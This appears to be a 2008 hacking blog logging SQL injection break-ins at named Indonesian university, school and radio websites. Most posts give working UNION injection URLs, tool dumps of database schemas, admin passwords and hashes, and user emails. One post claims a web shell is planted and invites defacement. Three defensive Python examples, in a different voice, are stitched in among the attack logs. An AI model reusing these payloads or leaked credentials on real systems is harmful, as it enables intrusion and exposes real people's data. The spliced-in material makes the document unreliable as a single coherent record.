viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, September 30, 2008

[SQLi] http://kemahasiswaan.umm.ac.id

8:09 PM Posted by viperfx07 No comments
login info (usr:pwd) = athox:mayax
I think it can be the exploit for the root domain, too.
[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kemahasiswaan
User: guest@10.10.1.1
Version: 5.0.27
[+] Showing Tables & Columns from database "kemahasiswaan"
[+] 17:03:41
[+] Number of Tables: 7

[Database]: kemahasiswaan
[Table: Columns]
[0]admin: id_user,user,password,nama,status,level
[1]agenda: id_agenda,judul,tanggal,agenda_awal,agenda_akhir
[2]beasiswa: id_beasiswa,judul,tanggal,beasiswa
[3]berita: id_berita,judul,tanggal,berita_awal,berita_akhir
[4]level: id_level,level
[5]lowongan: id_lowongan,judul,tanggal,lowongan
[6]menu: id_menu

[-] [17:03:55]
[-] Total URL Requests 28
[-] Done

|---------------------------------------------------------------|

[+] URL:http://kemahasiswaan.umm.ac.id/detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: kemahasiswaan
User: guest@10.10.1.1
Version: 5.0.27
[+] Dumping data from database "kemahasiswaan" Table "admin"
[+] Column(s) ['user', 'password']
[+] 17:04:14
[+] Number of Rows: 5


[-] [17:04:16]
[-] Total URL Requests 6
[-] Done

http://www.jayabaya.ac.id vulnerability

1:58 AM Posted by viperfx07 No comments
Instead of SQL injection, I try to explore some vulnerability like the previous one from polri.go.id. If you go to http://www.jayabaya.ac.id/infoshow.php?id= you will see an error message:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/jayabaya/public_html/info/infoisi.php on line 6
MySQL v4 is so tiring, so I left it for now.
There is a directory called info there. So let's check it out.
admin/ 01-Jun-2008 02:39 -
connect.php 21-Dec-2007 08:36 1k
info_lead.php 15-Feb-2006 14:02 1k
infoisi.php 05-Aug-2004 09:10 2k
infolist.php 28-Jan-2004 09:42 1k


Wow, there is an admin directory in the info dir? An idiot developer must be blamed here. OK, check the admin directory:
Parent Directory 01-Jun-2008 02:39 -
connect.php 21-Dec-2007 08:36 1k
info_delete.php 28-Jan-2004 09:42 1k
info_edit1.php 20-Jan-2005 12:08 2k
info_edit2.php 28-Jan-2004 09:42 2k
info_edit3.php 28-Jan-2004 09:42 1k
infoform.php 20-Jan-2005 12:38 2k
infoinput.php 28-Jan-2004 09:42 1k


Try them one by one. The interesting one is info_edit2.php. You can edit any info in that site with this. Try http://www.jayabaya.ac.id/info/admin/info_edit2.php?id=3 You can add JavaScript into the title or the body of this info. But unfortunately, you can't upload a shell to bring more destruction :(

Monday, September 29, 2008

[SQLi]http://www.unitomo.ac.id/

8:08 PM Posted by viperfx07 No comments
Go to http://alumni.unitomo.ac.id.
login info: labtek:1206.
PoC: http://unitomo.ac.id/berita.php?id=-360+union+select+1,concat_ws(0x10,login,password),3,4,5,6,7+from+unitomo.user--

So many databases can be accessed from this site. Idiot admin :)

Database: alumni
backup_blog
blogfe
blogfh
blogfia
blogfikom
blogfkip
blogfp
blogfs
blogft
bloggalery
bloglppm
blogpasca
blogperpus
blogunitomo
bursakerja
cdcol
dtiweb
fakultas
moodle
mysql
penelitian
phpmyadmin
test
unitomo

Saturday, September 27, 2008

[SQLi] http://www.mustikafm.com/

8:49 PM Posted by viperfx07 No comments
Admin Dir: http://www.mustikafm.com/v1/admin/
Admin Login: admin:mstk
Dump:
[+] URL:http://www.mustikafm.com/v1/perempuan.php?id=-7+union+select+darkc0de,2,3,4,5,6
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: mustika_proyek
User: mustika_proyek@localhost
Version: 4.1.22-standard
[+] Dumping data from database "mustika_proyek" Table "users"
[+] Column(s) ['username', 'password', 'email']
[+] 17:49:16
[+] Number of Rows: 11


[-] [17:49:18]
[-] Total URL Requests 12
[-] Done

[SQLi] http://www.eljohn.net/

7:38 PM Posted by viperfx07 No comments
Admin Dir = http://www.eljohn.net/
Admin Login = admin:admin. Idiot admin :)

[+] URL:http://www.eljohn.net/pusat/data_pusat.php?level=1&dir_id=6&dir_id0=-5%20union%20select%201,2,darkc0de,4,5
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: h18416_info2
User: h18416_nch2@localhost
Version: 5.0.32-Debian_7etch6
[+] 16:18:20
[Database]: h18416_info2
[Table: Columns]

[-] [16:23:57]
[-] Total URL Requests 713
[-] Done

[SQLi] http://www.sonora.co.id

6:49 PM Posted by viperfx07 No comments
PoC: http://www.sonora.co.id/page.php?m=jaringan&i=-1+union+select%201,2,3,4,5,6,7,unhex(hex(concat_ws(0x10,user,password))),9,10,11,12,13,14,15,16+from+mysql.user--

Problem: I still don't know what to do here :) MySQL v4 prevented me from extracting the database. The admin directory location is still unknown.

Database info:
Database: sonora_web
User: aha@localhost
Version: 4.1.7-nt

[SQLi] http://www.mstrifm.com

6:27 PM Posted by viperfx07 No comments
Problem: where is the admin directory? I just went to /config, and the username & password used there are not from the MySQL table.

Database info:
Database: mstri_mstri
User: mstri_select@localhost
Version: 5.0.45-community-log

Dump:

[+] URL:http://www.mstrifm.com/berita.php?id=-69+union+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: mstri_mstri
User: mstri_select@localhost
Version: 5.0.45-community-log
[+] Showing Tables & Columns from database "mstri_mstri"
[+] 14:44:30
[+] Number of Tables: 29

[Database]: mstri_mstri
[Table: Columns]

[-] [14:45:52]
[-] Total URL Requests 195
[-] Done

[+] URL:http://www.mstrifm.com/berita.php?id=-69+union+select+1,darkc0de,3,4,5,6,7,8,9,10,11,12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: mstri_mstri
User: mstri_select@localhost
Version: 5.0.45-community-log
[+] Dumping data from database "mstri_mstri" Table "admin"
[+] Column(s) ['id', 'name', 'password']
[+] 14:46:47
[+] Number of Rows: 10


[-] [14:46:50]
[-] Total URL Requests 11
[-] Done

Thursday, September 25, 2008

Making the backspace key in Firefox a shortcut key to go back in Ubuntu!

11:40 PM Posted by viperfx07 No comments
Coming from Windows a few months ago, one of the things I took for granted was the backspace key being a shortcut key for the back button on my web browser - Firefox.

Once I shifted over to Ubuntu, this shortcut was missing from a default installation.

If you want to replicate how the Firefox web browser on Windows maps the backspace key to go back a page on Linux-based systems, do the following:

* Open up firefox
* In the address bar, type about:config *this should give you a payload of preferences going down the page*
* Once this happens, enter the word “backspace” in the filter field; this should narrow the list to one entry that says browser.backspace_action.
* Double click on the entry and change the value to 0 instead of 1.

The change should be immediate, so if you now press the [Backspace] key, it functions as a back button. I must have done this several times when I was installing and reinstalling distributions as I messed around with my installations, but kept forgetting how to do it. :)

So this is more a quick note than any ground breaking hack.

Wednesday, September 24, 2008

[SQLi] http://law.ui.ac.id

6:06 PM Posted by viperfx07 No comments
login (username:passwd) = admin:admiN
Problem: where is the admin dir?
Tool: blindext.py (schemafuzz.py can't do it because of the restriction below)

[+] URL: http://www.law.ui.ac.id/berita.php?bid=380
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 15:08:22
[0]: 4.1.11-Debian_4sarge8-log:wwwlaw:wwwlaw

Database information = http://www.law.ui.ac.id/berita.php?bid=-380+union+select+1,2,UNHEX(HEX(concat_ws(char(58),database(),version(),user()))),4,5,6--

I use UNHEX & HEX because there is a conversion error if you don't use this "trick". The error message:
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
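From the defender's side, the UNION PoC URLs quoted throughout this page (negated id, union select, concat_ws, the unhex(hex()) collation workaround, the darkc0de marker) and the hundreds of requests per script that the blind tools generate are both visible in a plain web server access log. The following is an added example, not the blog's or any tool's code: it parses constructed Apache-style log lines (the sample lines and IPs are made up here, shaped like the PoCs above) and flags both kinds of signal.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" access-log line: client IP, timestamp, request line, status, size.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Markers of UNION-based extraction in the shape the PoC URLs on this page take. They are
# matched against the URL-decoded, lower-cased query string, so "+", "%20" and case do not hide them.
UNION_SIGS = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b")),
    ("negated_id", re.compile(r"(?:^|&)\w+=-\d+\s")),        # id=-46 union ... (empties the real row)
    ("concat_ws", re.compile(r"\bconcat_ws\s*\(")),          # packing two columns into one output field
    ("unhex_hex", re.compile(r"\bunhex\s*\(\s*hex\s*\(")),   # the collation-error workaround from this post
    ("mysql_user", re.compile(r"\bfrom\s+mysql\.user\b")),   # reading the server's own account table
    ("comment_tail", re.compile(r"--\s*$")),                 # rest of the original query commented out
    ("darkc0de_marker", re.compile(r"darkc0de")),            # literal marker the dumping tool injects
]


def parse_line(line):
    """Split one access-log line into fields; the query string is decoded and lower-cased."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = path
    rec["query"] = unquote_plus(query).lower()
    return rec


def sqli_indicators(query):
    """Names of every UNION-extraction marker present in a decoded query string, in UNION_SIGS order."""
    return [name for name, rx in UNION_SIGS if rx.search(query)]


def scan_log(text, volume_threshold=20):
    """Two kinds of finding: signature hits per request, and per-(ip, path) request volume.
    Blind extraction (the blindext.py runs on this page show 200 to 1700 requests to one script)
    stands out as volume even when no single request carries an obvious marker."""
    findings = []
    per_ip_path = Counter()
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        per_ip_path[(rec["ip"], rec["path"])] += 1
        hits = sqli_indicators(rec["query"])
        if hits:
            findings.append({"kind": "union", "ip": rec["ip"], "path": rec["path"], "indicators": hits})
    for (ip, path), n in sorted(per_ip_path.items()):
        if n >= volume_threshold:
            findings.append({"kind": "volume", "ip": ip, "path": path, "indicators": [f"{n} requests"]})
    return findings


# Constructed sample log (not from any real server). Three requests mirror the PoC URL shapes
# quoted on this page; the last client re-requests one article 25 times with no marker at all,
# which is what a blind extraction run looks like from the server's side.
_LINES = [
    '10.0.0.5 - - [30/Sep/2008:17:03:41 +0700] "GET /detail.php?id_lowongan=46 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [30/Sep/2008:17:03:42 +0700] "GET /detail.php?id_lowongan=-46+union+select+1,2,3,darkc0de HTTP/1.1" 200 4870 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [30/Sep/2008:17:04:14 +0700] "GET /berita.php?id=-360+union+select+1,concat_ws(0x10,login,password),3,4,5,6,7+from+unitomo.user-- HTTP/1.1" 200 4910 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [30/Sep/2008:17:05:00 +0700] "GET /page.php?m=jaringan&i=-1+union+select%201,2,unhex(hex(concat_ws(0x10,user,password))),9+from+mysql.user-- HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
] + [
    '10.0.0.11 - - [30/Sep/2008:17:06:%02d +0700] "GET /berita.php?bid=380 HTTP/1.1" 200 6000 "-" "Mozilla/5.0"' % s
    for s in range(25)
]
SAMPLE_LOG = "\n".join(_LINES) + "\n"


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```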



Dump:


[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!

[14:30:33] StartTime
[+] Fuzzing Tables...

[Table]:users
[Column]:user_name
[Column]:user_password
[Column]:user_login
[Column]:user_id

[14:31:48] EndTime
[-] Total URL Requests 226
[-] Done


[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Dumping data from database "WWWLAW" Table "users"
[+] Column(s) ['user_login', 'user_password']
[+] 14:57:25
[+] Number of Rows: 4

[0]: admin:admiN

[SQLi] http://www.smanu1-gsk.sch.id

2:43 PM Posted by viperfx07 No comments
username:passwd = ADMIN:105452



Website: http://www.smanu1-gsk.sch.id
Tool: schemafuzz.py (wow, it's a great tool. I should use it instead of blindext.py)


[+] URL:http://www.smanu1-gsk.sch.id/?grp_=galery_&id_=-24%20union%20select%201,darkc0de,3,4,5,6
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t84036_smanu
User: t84036_smanu@localhost
Version: 5.0.32-Debian_7etch6
[-] Done



[Database]: t84036_smanu
[Table: Columns]
[0]agenda_: id_,judul_item_,item_,tanggal_
[1]alumni_: id_,nama_,tempat_lahir_,tanggal_lahir_,jurusan_,angkatan_,alamat_rumah_,telp_rumah_,perusahaan_,alamat_perusahaan_,telp_perusahaan_,jabatan_,email_
[2]artikel_: id_,judul_menu_,judul_item_,link_,aktif_,tanggal_aktif_
[3]berita_: id_,judul_item_,gambar_,sinopsis_,item_,pembuat_,tanggal_buat_,aktif_,tanggal_aktif_
[4]chat_: id_,nama_,email_,pesan_
[5]dual: dum
[6]fasilitas_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[7]galery_: id_,judul_item_,tanggal_,link_,pembuat_,komentar_
[8]hak_akses_: pengguna_,site_map_
[9]jurusan_: id_,nama_,tanggal_mulai_,tanggal_akhir_
[10]pengajar_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[11]pengguna_: id_,nama_,nama_lengkap_,kunci_,level_
[12]pengumuman_: id_,judul_menu_,judul_item_,nama_panggil_,nama_sukses_,nama_gagal_,keterangan_1,keterangan_2,keterangan_3,full_,contoh_,aktif_,tanggal_aktif_
[13]pengumuman_det_: id_,id_grp_,nomor_,keterangan_1,keterangan_2,keterangan_3
[14]profile_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[15]siswa_: id_,judul_menu_,judul_item_,pembuat_,tanggal_buat_,item_,aktif_,tanggal_aktif_
[16]site_map_: id_

[-] [11:33:23]
[-] Total URL Requests 107
[-] Done


[+] URL:http://www.smanu1-gsk.sch.id/?grp_=galery_&id_=-24%20union%20select%201,darkc0de,3,4,5,6
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t84036_smanu
User: t84036_smanu@localhost
Version: 5.0.32-Debian_7etch6
[+] Dumping data from database "t84036_smanu" Table "pengguna_"
[+] Column(s) ['id_', 'nama_', 'kunci_', 'level_']
[+] 11:35:21
[+] Number of Rows: 6


[-] [11:35:24]
[-] Total URL Requests 7
[-] Done

Sunday, September 21, 2008

[SQLi] http://www.obengware.com

10:57 PM Posted by viperfx07 No comments
admin username = admin
admin passwd = 15287232

Problem: where is the admin directory?


[+] URL:http://obengware.com/news/index.php?cat_id=&tim=1221955199
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 21:38:25
[0]: 5.0.32-Debian_7etch6:t31237_news@localhost:t31237_news

[-] 21:52:57
[-] Total URL Requests 388
[-] Done

[+] URL:http://obengware.com/news/index.php?cat_id=&tim=1221955199
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "t31237_news"
[+] 21:41:13
[+] Number of Rows: 18

[0]: articles
[1]: ban_group
[2]: ban_source
[3]: categories
[4]: comments
[5]: newsletter
[6]: poll
[7]: poll_ip
[8]: poll_result
[9]: properties
[10]: rating
[11]: session
[12]: session_detail
[13]: styles
[14]: sub_categories
[15]: topmenu
[16]: users
[17]: visitors

[-] 22:31:01
[-] Total URL Requests 1237
[-] Done


[+] URL:http://obengware.com/news/index.php?cat_id=&tim=1221955199
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "t31237_news" Table "users"
[+] Column(s) ['username', 'password', 'root']
[+] 22:55:05
[+] Number of Rows: 2

[0]: admin:fbf21ad480de232810e70a7698e627c6:0
[1]: news:acc27bdc9f7dafd9e2f43945fd692dca:0

Friday, September 19, 2008

[SQLi] http://career.sbm.itb.ac.id/

5:42 PM Posted by viperfx07 No comments
Yeah, at last, I found an easy SQL injection :D

Website: http://career.sbm.itb.ac.id/
Bug: SQL injection
Tool: -




Method: ' or 'a'='a in the login & password textboxes

You can deface it by uploading a shell like c99, r57, etc. Here, I have injected the shell. Just do the rest :D
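Why the method in this post works, and what stops it, as an added example that is not the post's own code: the same login query written with string concatenation and with bound parameters, run against a constructed in-memory SQLite table (the account name and password are sample values). A real table would also store a salted password hash rather than the password itself, which several of the dumps on this page show in the clear.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table with one sample account (not data from the page)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT NOT NULL, password TEXT NOT NULL)")
    con.execute("INSERT INTO users (login, password) VALUES ('webadmin', 'sample-only-pw')")
    con.commit()
    return con


def login_concat(con, user, pwd):
    """Vulnerable pattern: both form fields are spliced into the SQL text. The quote inside
    "' or 'a'='a" closes the string literal, and the rest of the field becomes query logic:
    WHERE login = '' or 'a'='a' AND password = '' or 'a'='a'  -- always true."""
    sql = ("SELECT id, login FROM users WHERE login = '" + user
           + "' AND password = '" + pwd + "'")
    return con.execute(sql).fetchone()


def login_param(con, user, pwd):
    """Hardened form: bound parameters. The values travel separately from the statement,
    so a quote in a field is just a character to compare, never part of the SQL."""
    sql = "SELECT id, login FROM users WHERE login = ? AND password = ?"
    return con.execute(sql, (user, pwd)).fetchone()


TAUTOLOGY = "' or 'a'='a"   # the method quoted in the post, typed into both textboxes


def compare():
    """Run both handlers with the valid login and with the tautology.
    Returns (concat_valid, concat_tautology, param_valid, param_tautology)."""
    con = make_db()
    return (
        login_concat(con, "webadmin", "sample-only-pw"),
        login_concat(con, TAUTOLOGY, TAUTOLOGY),
        login_param(con, "webadmin", "sample-only-pw"),
        login_param(con, TAUTOLOGY, TAUTOLOGY),
    )


if __name__ == "__main__":
    print(compare())
```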


Thursday, September 18, 2008

[SQLi] http://www.unesa.ac.id

9:37 PM Posted by viperfx07 No comments
admin username = ari
admin password = unesah

Problem: Where is the admin directory?

Website:http://www.unesa.ac.id
Bug: SQL injection
Tool: blindext.py

Dumps:

[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 17:45:33
[+] Number of Rows: 1

[0]: webunesa

[-] 17:46:20
[-] Total URL Requests 80
[-] Done



[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!

[17:46:30] StartTime
[+] Fuzzing Tables...

[Table]:user
[Column]:passwd
[Column]:id
[Column]:email
[Column]:login

[17:47:26] EndTime
[-] Total URL Requests 227
[-] Done



[+] URL:http://www.unesa.ac.id/unesa.php?s=berita&xkd=111
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "webunesa" Table "user"
[+] Column(s) ['passwd', 'id', 'email', 'login']
[+] 17:47:56
[+] Number of Rows: 15

[0]: a456cd1f2bb4665b380ad93060b977b1:111:soboparan@yahoo.com:ari
[1]: 4ea43e57d6f0054756af707ba44e85cc:111::pasca
[2]: 25eb39c0affd2939b4291d4141c4cb5b:111:alim_sumarno@yahoo.com:alim

I terminated here because it took a long time :). The admin is in the first row.

[SQLi] http://www.fti-tarumanagara.or.id

9:20 PM Posted by viperfx07 No comments
Another victim :D

Website: http://www.fti-tarumanagara.or.id
Bug: SQL injection
Tool: blindext.py

Dumps:

[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 12:02:19
[0]: 5.0.18-nt:root@localhost:dbfti

[-] 12:03:12
[-] Total URL Requests 220
[-] Done




[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 11:54:38
[+] Number of Rows: 24

[0]: Copy of dbskripsi
[1]: Copy of kp_db
[2]: Copy of labfti
[3]: alumniuntar
[4]: builderdb
[5]: cdcol
[6]: data
[7]: dbfti
[8]: dbseminar
[9]: dbskripsi
[10]: dbskripsi_onupdate
[11]: dbsnti
[12]: dbwebsitenews
[13]: helpdesk
[14]: kp_db
[15]: kp_db_test
[16]: labfti
[17]: mysql
[18]: nontemplatedb
[19]: phpmyadmin
[20]: templatedb
[21]: templateuserdb
[22]: test
[23]: webauth

[-] 12:02:28
[-] Total URL Requests 1787
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "dbfti"
[+] 12:03:25
[+] Number of Rows: 18

[0]: tbbanner
[1]: tbbidpenelitian
[2]: tbevents
[3]: tbfavlinks
[4]: tbjurnalilmiah
[5]: tbmatakuliah
[6]: tbmatakuliahpil
[7]: tbmatakuliahsilabus
[8]: tbmember
[9]: tbnews
[10]: tbormadetil
[11]: tbormagaleri
[12]: tbormamhs
[13]: tbpenelitian
[14]: tbpolling
[15]: tbpollingdetail
[16]: tbsitemap
[17]: tbstaff

[-] 12:20:36
[-] Total URL Requests 1552
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "dbfti" and Table "tbmember"
[+] 12:20:31
[+] Number of Rows: 9

[0]: user
[1]: pass
[2]: email
[3]: nama
[4]: tgl_lahir
[5]: jk
[6]: alamat
[7]: hp
[8]: type

[-] 12:27:52
[-] Total URL Requests 367
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "dbfti" Table "tbmember"
[+] Column(s) ['user', 'pass', 'email', 'type']
[+] 12:30:51
[+] Number of Rows: 1

[0]: admin:67e6d175480398b4c98842c648bceb4d:admin@fti-tarumanagara.or.id:Admin

[-] 12:36:10
[-] Total URL Requests 535
[-] Done



[+] URL:http://www.fti-tarumanagara.or.id/index.php?a=news&detnews=96
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "builderdb" Table "user_account"
[+] Column(s) ['Username', 'Password']
[+] 13:13:10
[+] Number of Rows: 13

[0]: suryana:efd92f19bd78ab7e59775959c014f5aa
[1]: l3lyh:1cc56014cc296ef8cc6ffd2635d7c3dc
[2]: ria_yuni:9a2891b0b857317639a177bcda

[SQLi] http://www.unimedia.ac.id

8:58 PM Posted by viperfx07 No comments
After reading some forums, I tried an SQL injection tool called blindext.py from http://forum.darkc0de.com. It's a simple tool, but it's great. Therefore, I tried it on some websites that can be exploited with SQL injection. Unfortunately, MD5 is hard to break. It needs a lot of time to crack, so I just left it uncracked. Here is my first victim :)

Website: http://www.unimedia.ac.id/
Bug: SQL injection
Tool: blindext.py

Dumps:

[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 10:52:25
[0]: 5.0.51-log:umn@localhost:umn

[-] 10:53:12
[-] Total URL Requests 206
[-] Done




[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing all databases current user has access too!
[+] 10:12:27
[+] Number of Rows: 2

[0]: test
[1]: umn

[-] 10:12:48
[-] Total URL Requests 80
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Tables from database "umn"
[+] 10:13:08
[+] Number of Rows: 6

[0]: article
[1]: menu
[2]: myinfo
[3]: mymedia
[4]: myuser
[5]: registrasi_baru

[-] 10:15:04
[-] Total URL Requests 379
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Showing Columns from database "umn" and Table "myuser"
[+] 10:18:32
[+] Number of Rows: 10

[0]: id
[1]: name
[2]: department
[3]: address
[4]: phone
[5]: email
[6]: mypass
[7]: level
[8]: view
[9]: sdate

[-] 10:20:25
[-] Total URL Requests 467
[-] Done



[+] URL:http://www.unimedia.ac.id/page.php?title=2007%2F2008&article=21
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v5.0.0 found!
[+] Dumping data from database "umn" Table "myuser"
[+] Column(s) ['id', 'name', 'email', 'mypass']
[+] 10:22:11
[+] Number of Rows: 2

[0]: 1:Web Admin UMN:webadmin@unimedia.ac.id:dW1uaWN0
[1]: 3:na:admin@min.net:author

[-] 10:24:26
[-] Total URL Requests 542
[-] Done
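The dumps above are produced by boolean-based blind injection: page.php takes ?article= and concatenates it into the WHERE clause, so every request yields one bit (article rendered or not), and a tool recovers any subquery result by searching each character's code point. The following Python is an added example written for this post; it is neither the blog's code nor blindext.py. It models the vulnerable page and its parameterised fix against a constructed in-memory SQLite database (standing in for the site's MySQL 5.0.51), reusing the `article`, `myuser` and `mypass` names from the dump with invented rows, and uses SQLite's `unicode(substr())` where a MySQL probe would use `ASCII(SUBSTRING())`.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's database (names from the dump, rows invented)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE myuser  (id INTEGER, name TEXT, email TEXT, mypass TEXT);
        INSERT INTO article VALUES (21, 'Academic calendar 2007/2008');
        INSERT INTO myuser  VALUES (1, 'Web Admin', 'webadmin@example.invalid', 'dW1uaWN0');
    """)
    return conn


def page_vulnerable(conn, article):
    """Models a page.php that pastes ?article= straight into the query.

    Returns True when an article is rendered and False when the page is empty;
    that single bit is all a boolean-based blind injection needs.
    """
    sql = "SELECT title FROM article WHERE id = " + article  # BUG: string concatenation
    return conn.execute(sql).fetchone() is not None


def page_fixed(conn, article):
    """The same page with a bound parameter: the value is never parsed as SQL."""
    row = conn.execute("SELECT title FROM article WHERE id = ?", (article,)).fetchone()
    return row is not None


def blind_extract(oracle, subquery, max_len=64):
    """Recover the result of `subquery` one character at a time.

    oracle(cond) must return True iff "WHERE id = <cond>" still yields a row.
    Each character is found by binary search over the 7-bit ASCII range (7
    requests); one extra round of 7 detects the end of the string.
    MySQL form of the probe: ASCII(SUBSTRING((subquery), pos, 1)) > mid.
    Returns (recovered_string, number_of_requests).
    """
    out, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"21 AND unicode(substr(({subquery}), {pos}, 1)) > {mid}"
            requests += 1
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # substr() past the end is '' and unicode('') is NULL, so never > mid
            break
        out += chr(lo)
    return out, requests


if __name__ == "__main__":
    db = make_db()
    secret = "SELECT mypass FROM myuser WHERE id = 1"
    value, n = blind_extract(lambda c: page_vulnerable(db, c), secret)
    print(f"vulnerable page leaked {value!r} in {n} requests")
    # Against the parameterised page the injected condition is just a string that
    # matches no id, so the oracle is always False and nothing leaks.
    value, n = blind_extract(lambda c: page_fixed(db, c), secret)
    print(f"fixed page leaked {value!r} after {n} requests")
```

Seven requests per character plus a terminating round is the same order of cost as the request counts in the dumps above (a few hundred requests for a 28-character version string or a six-row table listing), which is why blind extraction is slow but entirely practical. The only change in `page_fixed` is the bound parameter; the injected text is compared as a literal value against `id`, the page simply returns nothing, and the search terminates after one fruitless round.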

Wednesday, September 17, 2008

Backtrack 3

2:35 PM Posted by viperfx07 No comments
Description: CD Image
Name: bt3-final.iso
Size: 695 MB
MD5: f79cbfbcd25147df32f5f6dfa287c2d9
SHA1: 471f0e41931366517ea8bffe910fb09a815e42c7
Download: Click here

Description: USB Version (Extended)
Name: bt3final_usb.iso
Size: 784 MB
MD5: 5d27c768e9c2fef61bbc208c78dadf22
SHA1: 3aceedea0e8e70fff2e7f7a7f3039704014e980f
Download: Click here

Description: VMware Image
Name: BACKTRACK3_VMWare.rar
Size: 689 MB
MD5: 94212d3c24cf439644f158d90094ed6a
SHA1: 21c9a3f9658133efff259adbe290723583b4fd82
Download: Click here


BackTrack is the top-rated Linux live distribution focused on penetration testing. With no installation whatsoever, the analysis platform is started directly from the CD-ROM and is fully accessible within minutes.

